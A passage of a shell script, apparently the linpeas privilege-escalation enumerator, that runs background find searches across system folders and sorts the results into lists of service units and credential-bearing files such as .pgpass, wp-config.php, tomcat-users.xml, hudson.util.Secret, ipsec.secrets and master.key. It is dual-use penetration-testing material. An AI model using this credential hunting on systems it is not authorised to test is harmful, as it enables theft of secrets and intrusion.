\"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    789   FIND_CONCOURSE_AUTH=`eval_bckgrd "find ${ROOT_FOLDER}concourse-auth -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    790   FIND_CONCOURSE_KEYS=`eval_bckgrd "find ${ROOT_FOLDER}concourse-keys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    791 
    792   wait # Always wait at the end
    793   CONT_THREADS=0 #Reset the threads counter
    794 fi
    795 if [ "$SEARCH_IN_FOLDER" ] || echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then
    796   #GENERATE THE STORAGES OF THE FOUND FILES
    797   PSTORAGE_SYSTEMD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}run|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}bin" | grep -E ".*\.service$" | sort | uniq | head -n 70)
    798   PSTORAGE_TIMER=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}run|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}bin" | grep -E ".*\.timer$" | sort | uniq | head -n 70)
    799   PSTORAGE_SOCKET=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}sys|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}concourse-auth|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}applications|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}concourse-keys|^${ROOT_FOLDER}system|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}run|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}bin" | grep -E ".*\.socket$" | sort | uniq | head -n 70)
    800   PSTORAGE_DBUS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}etc|^${ROOT_FOLDER}usr" | grep -E "system\.d$|system-local\.d$|session\.d$|system-services$|services$" | sort | uniq | head -n 70)
    801   PSTORAGE_MYSQL=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "mysql$|passwd\.ibd$|password.*\.ibd$|pwd\.ibd$|mysqld\.cnf$|\.mylogin\.cnf$" | sort | uniq | head -n 70)
    802   PSTORAGE_MARIADB=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70)
    803   PSTORAGE_POSTGRESQL=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$|\.pgpass$|pgadmin4\.db$" | sort | uniq | head -n 70)
    804   PSTORAGE_APACHE_NGINX=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$|nginx\.conf$|nginx$" | sort | uniq | head -n 70)
    805   PSTORAGE_VARNISH=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "varnish$" | sort | uniq | head -n 70)
    806   PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^${ROOT_FOLDER}var|^${ROOT_FOLDER}private|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}mnt" | grep -E "sess_.*$" | sort | uniq | head -n 70)
    807   PSTORAGE_PHP_FILES=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70)
    808   PSTORAGE_APACHE_AIRFLOW=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "airflow\.cfg$|webserver_config\.py$" | sort | uniq | head -n 70)
    809   PSTORAGE_X11=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.Xauthority$" | sort | uniq | head -n 70)
    810   PSTORAGE_WORDPRESS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "wp-config\.php$" | sort | uniq | head -n 70)
    811   PSTORAGE_DRUPAL=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E '/default/settings.php' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "settings\.php$" | sort | uniq | head -n 70)
    812   PSTORAGE_MOODLE=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E 'moodle/config.php' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "config\.php$" | sort | uniq | head -n 70)
    813   PSTORAGE_TOMCAT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70)
    814   PSTORAGE_MONGO=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70)
    815   PSTORAGE_ROCKETCHAT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "rocketchat\.service$" | sort | uniq | head -n 70)
    816   PSTORAGE_SUPERVISORD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70)
